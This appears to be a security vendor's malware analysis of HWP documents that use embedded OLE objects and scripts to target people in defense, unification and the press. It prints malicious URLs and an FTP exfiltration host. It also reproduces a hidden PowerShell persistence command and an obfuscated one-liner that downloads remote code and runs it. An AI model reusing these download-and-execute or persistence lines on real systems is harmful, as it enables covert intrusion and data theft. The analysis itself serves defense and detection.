Warning Against HWP Documents Embedded with Malicious OLE Objects
AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas.
The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] has a similar operation method to the malware covered in a previous post [1] and also uses the same FTP server password. Such similarities allow us to believe that they were made by the same person.
The figure below shows a brief flow of operations of each type.
<Type 1>
This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.
| Date | File name |
| May 25, 2023 | Unification** cue sheet May 29 Mon.hwp |
| May 25, 2023 | 20230508_ProfessorMeetingMaterial_NewTemplate.hwp |
| May 25, 2023 | (***)2023-05-30 Material for Professor Meeting.hwp |
| May 30, 2023 | Payment Receipt (Chief ***).hwp |
| May 30, 2023 | (Template)Payment Receipt_Congratulatory and Condolence Money.hwp |
| June 22, 2023 | 20230512_MyungbakScenario_Details.hwp |
| June 22, 2023 | 1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp |
| June 22, 2023 | Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp |
| June 23, 2023 | [Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp |
| June 29, 2023 | National Defense and Protection Sacrificed to Political Disputes.hwp |
| July 11, 2023 | ** Unification April 30 2023 (Sun).hwp |
| July 17, 2023 | Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp |
| July 20, 2023 | 42- Wagner’s Lesson (Aug 2023).hwp |
| July 24, 2023 | [Template1] Business Budget Issue Request.hwp |
| Aug 14, 2023 | Dissertation Evaluation (** Kwon).hwp |
| Sep 01, 2023 | Evidentiary Documents of Incentive Payment.hwp |
| Sep 04, 2023 | ** Unification Sep 06 Final Wednesday.hwp |
| Sep 06, 2023 | ** Kim_Statement of Honorarium Payment.hwp |
| Sep 19, 2023 | [Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp |
Table 1. Identified HWP document file names
The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.
In the documents, the threat actor embedded an OLE object the size of which exceeds the page boundaries (see Figure 3), so that the OLE object runs no matter where the user clicks.
The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.
At the time of analysis, the URL was not available and anomalous behaviors could not be observed. The malicious URLs identified so far are as follows. It seems that these documents are being distributed to specific individuals due to the fact that each document uses a different parameter value.
- hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
- hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]
<Type 2>
This type has a malicious script file embedded in HWP documents, and ultimately, it executes an additional script code uploaded to GitHub. Below are the file names of HWP documents presumed to be this type.
| Date | File name |
| July 31, 2023 | test.hwp |
| July 27, 2023 | Honorarium Information_aa.hwp |
| Aug 31, 2023 | Consultation Request.hwp |
| Sep 01, 2023 | Honorarium Template.hwp |
| Sep 14, 2023 | main.hwp |
| Oct 04, 2023 | test1.hwp |
| 2023.10.04 | cna[q].hwp |
Table 2. Identified HWP document file names
The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).
When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.
zz.bat contains PowerShell commands that download and execute additional data by connecting to a GitHub address inside oz.txt.
Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.
down.txt, info.txt, and upload.txt seen in Figure 10 all have obfuscated pieces of data uploaded. Upon connecting to the corresponding URLs, these pieces of data are deobfuscated with a certain key value then executed.
The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.
| Function Name | Feature |
| mainFunc | Changes PowerShell policy Functions executed in the following order: getinfo – uploadResult – downCommand |
| getinfo | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt Collects user PC information such as network configuration information |
| uploadResult | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt Uploads the collected information to the threat actor’s FTP server |
| downCommand | Executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt Creates additional malicious files |
Table 3. Features of each function
The function mainFunc which is executed first changes the current user’s PowerShell policy with the following command and enables the execution of the PowerShell script that is downloaded later on.
- Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force
The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%\Ahnlab\Ahnlab.hwp.
The table below shows the collected pieces of information.
| Command | Collected Information |
| Get-ChildItem ([Environment]::GetFolderPath(“Recent”)) | List of recently used files |
| ipconfig /all | List of network configurations |
| Get-process | List of processes |
Table 4. Collected information
The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%\Ahnlab\Ahnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.
- Address: plm.myartsonline[.]com
- User name: 4154836
The function downCommand which is continuously executed afterward executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file for the malware to maintain persistence. To enable the malicious script to be executed continuously, the threat actor creates an LNK file in the Startup folder.
The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command which executes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run.
- LNK file command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log‘);invoke-expression $x} - thumbs.log data
[string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c
While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
With the malware from the post in June [2] also being distributed through HWP documents, there are multiple malicious HWP documents in distribution nowadays. When opening an HWP document, users must pay attention to its author and the sender.
[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
